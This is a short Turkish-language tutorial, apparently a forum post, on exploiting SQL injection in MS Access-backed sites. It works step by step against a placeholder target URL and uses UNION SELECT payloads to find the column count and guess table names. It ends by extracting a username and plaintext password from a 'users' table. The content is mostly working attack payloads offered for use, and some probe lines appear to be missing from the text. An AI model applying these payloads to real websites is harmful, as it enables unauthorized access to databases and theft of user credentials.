bu konumda size çok karşılaşılan bir açık olan MsAccess sql injectiondan bahsedeceğim.
Ayrıca şunuda söyliyeyim: Bana göre en zahmetli SQL İnjection türüdür.Ama öğrenmek lazım
hemen geçelim:
Açık ararken klasik şekilde a veya koyuyoruz.
hata geldi şimdi kolon bulucaz.
dedik hata geldi
dedik hata gitti demekki kolon sayımız 9muş.
www.hedefsite.com/show.php?id=3 union select 1,2,3,4,5,6,7,8,9 from admin
diyoruz.
Farkettiyseniz direkt olarak union select komutu yazmadım sonuna adminde ekledim.Çünkü MsAccessde direkt olarak kolonlar gözükmez.
yukarda komutumuzu girmiştik hata geldi.
tekrar deniyoruz:
www.hedefsite.com/show.php?id=3 union select 1,2,3,4,5,6,7,8,9 from users
dedik ve kolonları gördük.Yani adminimizle ilgili tablomuz usersimiş.
5. kolon gözükmüş olsun.
www.hedefsite.com/show.php?id=3 union select 1,2,3,4,admin,6,7,8,9 from users
dedik hata geldi.Çünkü yanlış kolon adı girdik.pes etmiyoruz
www.hedefsite.com/show.php?id=3 union select 1,2,3,4,username,6,7,8,9 from users
dedik ve kolonumuzda gözüktü usernamemiz.
username = HoLMeS
şimdi sıra şifrede
www.hedefsite.com/show.php?id=3 union select 1,2,3,pass,5,6,7,8,9 from users
dedik ve şifrede gözüktü.
username = HoLMeS
pass = holmes
buraya kadar arkadaşlar.